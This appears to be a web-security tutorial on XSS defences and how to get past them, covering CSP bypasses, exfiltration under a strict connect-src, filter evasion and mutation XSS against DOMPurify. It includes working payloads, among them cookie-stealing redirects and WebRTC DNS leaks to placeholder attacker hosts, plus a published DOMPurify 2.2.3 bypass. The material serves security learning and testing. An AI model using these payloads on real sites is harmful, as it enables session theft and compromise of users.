Protections
XSS is a well-known issue, and many protections try to limit its possibility on websites. There are basically two cases a website needs to handle when reflecting a user's content:
Content where no HTML is allowed (almost all data)
Content where a limited set of HTML tags is allowed (rich text, like editors)
The 1st is very easily protected by using HTML encoding. Many frameworks already do this by default, and explicitly have you write some extra code to turn it off. Most often this encodes only the special characters, like < to &lt;, > to &gt;, and " to &quot;. While this type of protection is completely safe in most cases, some situations exist where these specific characters are not required to achieve XSS. We've seen examples of Attribute Injection where a single quote (') is used instead, which may not be encoded and can thus be escaped, or where your attribute is not enclosed at all and a simple space character can add another malicious attribute. With Script Injection this is a similar story, as well as DOM XSS.
The 2nd case is very hard to protect securely. First, because many tags have unexpected abilities, like the javascript: protocol in <a href=...> links. If posting links is allowed, the filter needs to specifically prevent the javascript: protocol while still allowing regular https:// links. There exist a ton of different tags and attributes that can execute JavaScript (see the Cheat Sheet), making a blocklist almost infeasible; an allowlist should be used instead. The second reason this is hard is that browsers are weird, like really weird. The HTML specification contains a lot of rules and edge cases a filter should handle. If a filter parses a specially crafted payload differently from a browser, the malicious data might go unnoticed and end up executing in the victim's browser.
Content Security Policy (CSP)
A more modern protection against XSS and some other attacks is the Content Security Policy. This is a header (Content-Security-Policy:) or <meta> value in a response that tells the browser what should be allowed and what shouldn't. An important directive that can be set using this header is script-src, defining where JavaScript code may come from:
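A minimal sketch of such a policy, matching the description below (the example.com domain is illustrative):

```http
Content-Security-Policy: script-src 'self' https://example.com
```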
With the above policy set, any <script src=...> that is not from the current domain or "example.com" will be blocked. When you explicitly set a policy like this, it also disables inline scripts like <script>alert()</script> and event handlers like <style onload=alert()> from executing, even ones from the server itself, as there is no way to differentiate between intended and malicious ones. This possibly breaking change, where all scripts need to come from trusted URLs, is sometimes "fixed" by adding a special 'unsafe-inline' string that allows inline script tags and event handlers to execute, which, as the name suggests, is very unsafe.
A different, less common way to allow inline scripts without allowing all inline scripts is with nonces: random values generated by the server. Such a nonce is put inside the script-src directive like 'nonce-2726c7f26c', requiring every inline script to have a nonce= attribute equaling the specified random value. In theory, an attacker should not be able to predict this random value, as it should be different for every request. This works in a similar way to CSRF tokens and relies on secure randomness by the server. If implemented well, this is a very effective way of preventing XSS.
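As a sketch, using the nonce value from above (in practice it must be freshly generated for every response):

```html
<!-- Response header: Content-Security-Policy: script-src 'nonce-2726c7f26c' -->
<script nonce="2726c7f26c">console.log("runs: nonce matches")</script>
<script>console.log("blocked: no nonce")</script>
```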
The last important string in this directive is 'unsafe-eval', which is disabled by default, blocking several functions that can execute code from a string:
eval()
Function()
Passing a string to setTimeout(), setInterval() or window.setImmediate() (for example: setTimeout("alert()", 500))
Note however that this does not prevent all methods of executing code from a string. If 'unsafe-inline' allows it, you can still write event handlers to the DOM if required:
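A minimal sketch of this idea, assuming 'unsafe-inline' is present in script-src:

```js
// An onerror attribute turns its string value into code when the event
// fires, without ever calling eval() or Function()
const img = document.createElement("img");
img.setAttribute("onerror", "alert(document.domain)");
img.src = "invalid://"; // guaranteed to fail loading, triggering onerror
document.body.appendChild(img);
```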
To easily evaluate and find problems with a CSP header, you can use Google's CSP Evaluator, which tells you for every directive what potential problems it finds.
Hosting JavaScript on 'self'
The URLs and 'self' sources in this directive trust all scripts coming from those domains, meaning that in a secure environment no user data should be stored under them, like uploaded JavaScript files. If this is allowed, an attacker can simply upload and host their payload on an allowed website, and it is suddenly trusted by the CSP:
Payload:

```html
<script src="/uploads/payload.js"></script>
```
For more complex scenarios where you cannot directly upload .js files, the Content-Type: header comes into play. The browser decides, based on this header, if the requested file is likely to be a real script; if the type is image/png, for example, it will simply refuse to execute it:
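A sketch of what this refusal looks like (the path is hypothetical):

```html
<!-- If /uploads/payload.png is served with Content-Type: image/png,
     the browser blocks it with a MIME-type error in the console -->
<script src="/uploads/payload.png"></script>
```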
Some more ambiguous types are allowed, however, like text/plain, text/html, or no type at all. These are especially useful, as commonly a framework will decide what Content-Type to add based on the file extension, which may be empty in some cases, causing it to choose a type that still allows JavaScript execution. This ambiguity is prevented, however, by an extra X-Content-Type-Options: nosniff header that is sometimes set, making the browser's detection a lot more strict and only allowing real application/javascript files (full list).
An application may sanitize uploaded files by checking a few signatures to see if it looks like a valid PNG, JPEG, GIF, etc. file, which can limit exploitability, as the file still needs to be valid JavaScript code without SyntaxErrors. In these cases, you can try to make a "polyglot" that passes the validation checks of the server while remaining valid JavaScript, by using the file format in a smart way and language features like comments to remove unwanted code.
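A classic sketch of this idea is a GIF/JavaScript polyglot: the magic bytes "GIF89a" happen to form a valid JavaScript identifier, so a file starting with them can pass a signature check while still parsing as code:

```js
GIF89a=1 // the GIF magic bytes double as a global variable assignment
alert(document.domain)
```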
Another idea, instead of storing data, is reflecting data. If there is any page that generates a response you can turn into valid JavaScript code, you may be able to abuse it for your payload. JSONP or other callback endpoints are also useful here, as they always have the correct Content-Type and may allow you to insert arbitrary code in place of the ?callback= parameter, serving as your reflection of valid JavaScript code.
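A hypothetical JSONP endpoint illustrating this (the URL and the unfiltered reflection are assumptions):

```js
// Request:  https://trusted.example/api/data?callback=alert(document.domain)//
// Response, served with a JavaScript Content-Type:
//   alert(document.domain)//({"some":"data"})
// The reflected callback name runs as code, and // comments out the rest
```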
Exfiltrating with strict connect-src
This directive defines which hosts can be connected to, meaning that if your attacker's server is not on the list, you cannot make a fetch() request to it like normal in order to exfiltrate any data. While there is no direct bypass for this, you may still be able to connect to an allowed origin to exfiltrate data, by storing it there and later retrieving it as the attacker in a place you can find. By Forcing requests - fetch(), you could, for example, make a POST request that changes a profile picture, or some other public data, while embedding the data you want to exfiltrate. This way the policy is not broken, but the attacker can still find the data on the website itself.
With this technique, remember that even one bit of information is enough, as you can often repeat it to reveal a larger amount of information.
A more general bypass for this is to redirect the user fully using JavaScript, as browsers do not prevent this. Then in the URL, you put the data you want to exfiltrate to receive it in a request:
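A minimal sketch (attacker.example is a placeholder for your own server):

```js
// Top-level navigation is not restricted by connect-src, so the data
// ends up in the attacker's access logs via the query string
location = "https://attacker.example/leak?d=" + encodeURIComponent(document.cookie);
```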
Another useful method is WebRTC, which bypasses connect-src. The DNS lookup it performs is not blocked and allows for dynamically inserting data into the subdomain field. Domain names are case-insensitive, so an encoding scheme like Base32 can be used to exfiltrate arbitrary data (max ~100 characters per request). Using interactsh it is easy to set up a domain to exfiltrate to:
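Running the client is enough; it registers a fresh subdomain (under one of the public oast.* domains by default), prints it, and then logs any interactions with it:

```sh
interactsh-client
```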
Then we use the WebRTC trick to exfiltrate any data over DNS:
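A sketch of the trick, assuming your interactsh domain is attacker.oast.fun. The text above suggests Base32; for brevity this sketch hex-encodes the data instead, which is also case-insensitive and valid in DNS labels:

```js
// connect-src does not cover the DNS lookup that ICE performs for the
// STUN server's hostname, so the encoded data leaks via DNS
const hex = [...document.cookie]
  .map(c => c.charCodeAt(0).toString(16).padStart(2, "0"))
  .join("");
const pc = new RTCPeerConnection({
  // DNS labels are limited to 63 characters, hence the slice
  iceServers: [{ urls: `stun:${hex.slice(0, 60)}.attacker.oast.fun` }],
});
pc.createDataChannel(""); // start ICE gathering
pc.createOffer().then(o => pc.setLocalDescription(o)); // triggers the DNS lookup
```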
Finally, we receive the DNS requests on the interactsh-client, where the subdomain labels can be decoded back into the original data.
CDNs in script-src (AngularJS Bypass + JSONP)
Every origin in this directive is trusted with all URLs it hosts. A common addition here is CDN (Content Delivery Network) domains that host many different JavaScript files for libraries. While in very unrestricted situations a CDN like unpkg.com will host every file on NPM, even malicious ones, others are less obvious.
The cdnjs.cloudflare.com or ajax.googleapis.com domains, for example, host only specific popular libraries which should be secure, but some have exploitable features. The most well-known is AngularJS, which a vulnerable site may also host itself, removing the need for a CDN. This library searches for specific patterns in the DOM that can define event handlers without the regular inline syntax. This bypasses the CSP and can allow arbitrary JavaScript execution by loading such a library and including your own malicious content in the DOM:
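A hedged example of such a block, based on well-known AngularJS gadgets (the CDN path and version are illustrative):

```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.3/angular.min.js"></script>
<div ng-app ng-csp>
  <!-- autofocus fires the focus event; $event.view is the window object -->
  <input autofocus ng-focus="$event.view.alert(document.domain)">
</div>
```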
Loading any of these blocks in a CSP that allows it will trigger the alert(document.domain) function. A common pattern for finding these bypasses is using Angular to create an environment where code can be executed from event handlers, and then another library or callback function to click on the element, triggering the handler with your malicious code.
See jsonp.txt for a not-so-updated list of public JSONP endpoints you may find useful.
CSP Bypass Search: a public list of Angular/JSONP gadgets for CSP bypasses.
See AngularJS for more complex AngularJS injections that bypass filters. Also note that other frameworks such as VueJS or HTMX may allow similar bypasses if they are accessible while 'unsafe-eval' is set in the CSP.
Redirect to upper directory
URLs in a CSP may be absolute, not just an origin. The following example provides a full URL to base64.min.js, and you would expect that only that script could be loaded from the cdnjs.cloudflare.com origin:
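A sketch of such a policy (the exact library path is illustrative):

```http
Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/ajax/libs/Base64/1.3.0/base64.min.js
```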
This is not entirely true, however. If another allowed origin, like 'self', contains an Open Redirect vulnerability, you may redirect a script URL to any path on cdnjs.cloudflare.com!
Sandbox-iframe XSS challenge solution - Johan Carlsson: a challenge writeup involving a CSP open redirect bypass.
The following script would be allowed by the CSP spec. Note that the angular.js path is not normally allowed, but it is through the redirect, because its origin is allowed. This can be abused with some HTML that executes arbitrary JavaScript, even if 'unsafe-eval' is not set:
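A hedged sketch, assuming an open redirect at /redirect?url= on the trusted 'self' origin (both the redirect endpoint and the Angular version are assumptions):

```html
<script src="/redirect?url=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.3/angular.min.js"></script>
<div ng-app ng-csp>
  <input autofocus ng-focus="$event.view.alert(document.domain)">
</div>
```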
Nonce without base-uri
If a CSP filters scripts based on a nonce and does not specify a base-uri directive, you may be able to hijack relative script URLs after your injection point.
Let's say the target page with an HTML-injection looks as follows:
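A sketch of such a page (the nonce and script path are illustrative), with the injection point before the script tag:

```html
<!-- HTML-injection lands here -->
<script src="/script.js" nonce="2726c7f26c"></script>
```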
The relative <script> tag can be redirected to another domain using the <base> tag as follows:
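```html
<base href="https://attacker.com/">
```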
Now, the script with a valid nonce is loaded from https://attacker.com/script.js
instead of the target website!
Filter Bypasses
Some of the most useful and common filter bypasses are shown in Common Filter Bypasses.
If a server is checking your input for suspicious strings, they will have a hard time, as there are many ways to obfuscate your payloads. Even a simple <a href=...> tag has many places where the browser allows special and unexpected characters, which may break the pattern the server is trying to search for. Here is a clear diagram showing where you can insert which characters:
The XSS Cheat Sheet by PortSwigger has an extremely comprehensive list of all possible tags, attributes, and browsers that allow JavaScript execution, with varying levels of user interaction:
You can use the above list to filter certain tags you know are allowed/blocked, and copy all payloads for fuzzing using a tool to find what gets through a filter.
JavaScript payload
In case you are able to inject JavaScript correctly but are unable to exploit it due to the filter blocking your JavaScript payload, there are many tricks to still achieve code execution. One of them is using the location variable, which can be assigned a javascript: URL just like in DOM XSS. This gives a very simple function call trigger, as we don't need parentheses or backticks in the source: they can be escaped inside the string like \x28 and \x29.
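A small sketch of this trick:

```js
// No literal parentheses appear in the source; the \x28 and \x29
// string escapes become ( and ) when the javascript: URL is evaluated
location="javascript:alert\x28document.domain\x29"
```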
In fact, we can even go one step further and use the global name variable, which is controllable by an attacker. It is so global that it even persists between navigations. When a victim visits our site, like in an XSS scenario, we can set the name variable to any payload we like and redirect to the vulnerable page to trigger it (see this video for more info and explanation):
JavaScript Payload:
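A hedged reconstruction of such a trigger, reusing the location trick from above (the original snippet may differ):

```js
location=name
```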
Attacker's page:
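A sketch of the attacker's page that plants the payload (the target URL is a placeholder):

```html
<script>
  // window.name survives the navigation below
  name = "javascript:alert(document.domain)";
  location = "https://target.example/page-with-the-injection";
</script>
```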
Mutation XSS & DOMPurify
Mutation XSS is a special kind of XSS payload that abuses a difference between the checking environment and the destination environment. The browser has special parsing rules for HTML inside certain tags that differ from other tags. This difference can sometimes be abused to create a payload that is benign in the checking context, but is mutated by the browser into a malicious payload in a different context.
Let's take the following example: The DOMPurify sanitizer is used to filter out malicious content that could trigger JavaScript execution, which it does perfectly on the following string:
DOMPurify:
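Reconstructed from the description below (the exact original string may differ slightly):

```html
<p id="</title><img src=x onerror=alert()>">
```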
There is a <p> tag with "</title><img src=x onerror=alert()>" as its id= attribute, nothing more, and surely nothing that would trigger JavaScript. But then comes along the browser, which sees this payload placed into the DOM, inside the existing <title> tag:
Browser DOM:
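A sketch of the document at this point, before mutation:

```html
<title>
  <p id="</title><img src=x onerror=alert()>">
</title>
```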
Perhaps surprisingly, it is parsed differently now that it is inside of the <title> tag. Instead of a simple <p> tag with an id= attribute, this turns into the following after mutation:
Browser DOM after mutation:
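Reconstructed from the description: inside <title>, no tags are parsed, so the first </title>, even though it sits inside the attribute, closes the element:

```html
<title>
  <p id="</title>
<img src="x" onerror="alert()">  <!-- a real tag now, executing JavaScript -->
">
```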
See what happened here? The </title> sequence inside the attribute suddenly closed the tag and started a real <img> tag with the malicious onerror= attribute, executing JavaScript and causing XSS! This means that in the following example, alert(1) fires but alert(2) does not:
Demo:
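A sketch of this demo, assuming the same sanitized string is written into both contexts:

```html
<title><p id="</title><img src=x onerror=alert(1)>"></title>  <!-- mutates: fires -->
<p id="</title><img src=x onerror=alert(2)>">                 <!-- stays an attribute -->
```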
DOMPurify does not know about the <title> tag the application later puts the payload in, so it can only say if the HTML is safe on its own. In this case it is, so we bypass the check through Mutation XSS.
A quick for-loop later, we can find that this same syntax works for all these tags: iframe, noembed, noframes, noscript, script, style, textarea, title and xmp.
These types of Mutation XSS tricks are highly useful for bypassing simpler sanitizers, seeing as even DOMPurify had to put in real effort to get this far. Payloads that put the real XSS in an attribute and use mutation to escape out of it can be unexpected; developers may not have thought about the possibility and only use some regexes or naive parsing.
Where this gets really powerful is combining it with HTML encoding, if the sanitizer parses the payload and then reassembles the HTML afterward, for example:
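An illustrative sketch of this class of bug (the naive parse-and-reassemble sanitizer is an assumption, not DOMPurify):

```html
<!-- Input: the "XSS" is harmlessly HTML-encoded inside an attribute -->
<a id="&quot;&gt;&lt;img src=x onerror=alert()&gt;">

<!-- A sanitizer that decodes attribute values while parsing, but
     forgets to re-encode them when reassembling, produces: -->
<a id=""><img src=x onerror=alert()>">
```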
There is also another interesting exploitable scenario, where your input is placed inside an <svg> tag after sanitization:
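Reconstructed from the breakdown below (the exact original payload may differ):

```html
<style><!--</style><a id="--!><img src=x onerror=alert()>">
```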
This is another DOMPurify "bypass" with a more common threat: all a developer needs to do is put your payload inside of an <svg> tag, while sanitizing it without that <svg> context. This payload is a bit more complicated, so here's a breakdown. The trick is the difference between SVG parsing and HTML parsing. In HTML, which DOMPurify sees, the <style> tag is special, as it switches the parsing context to CSS, which doesn't support comments like <!--, so it won't be interpreted as one. Therefore the </style> closes it, and the <a id="..."> opens another innocent tag and attribute. DOMPurify doesn't notice anything wrong here and won't alter the input. In SVG, however, the <style> tag doesn't behave specially and is interpreted like any other tag in XML. The children inside may be more tags, a <!-- comment in this case. This comment only ends at the --!> sequence at the start of the <a id="--!> attribute, and that means after the comment comes more raw HTML. Then our <img onerror=> tag is read for real and the JavaScript is executed!
Tip: Instead of a comment, another possibility is using the special <![CDATA[ ... ]]> syntax in SVGs, which abuses a similar parsing difference:
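A hedged variant, constructed by analogy with the comment trick above (the original payload may differ):

```html
<style><![CDATA[</style><a id="]]><img src=x onerror=alert()>">
```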
DOMPurify outdated versions
While the tricks mentioned above can get around specific situations, an outdated version of the dompurify library can cause every output to be vulnerable by completely bypassing DOMPurify in a regular context. The latest vulnerable version is 2.2.3, with a complete bypass found by @TheGrandPew in December 2020. The following payload will trigger alert() when sanitized and put into a regular part of the DOM:
DOMPurify 2.2.3 Bypass:
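A hedged reproduction of the published payload from public writeups (verify against the original advisory before relying on it):

```html
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">
```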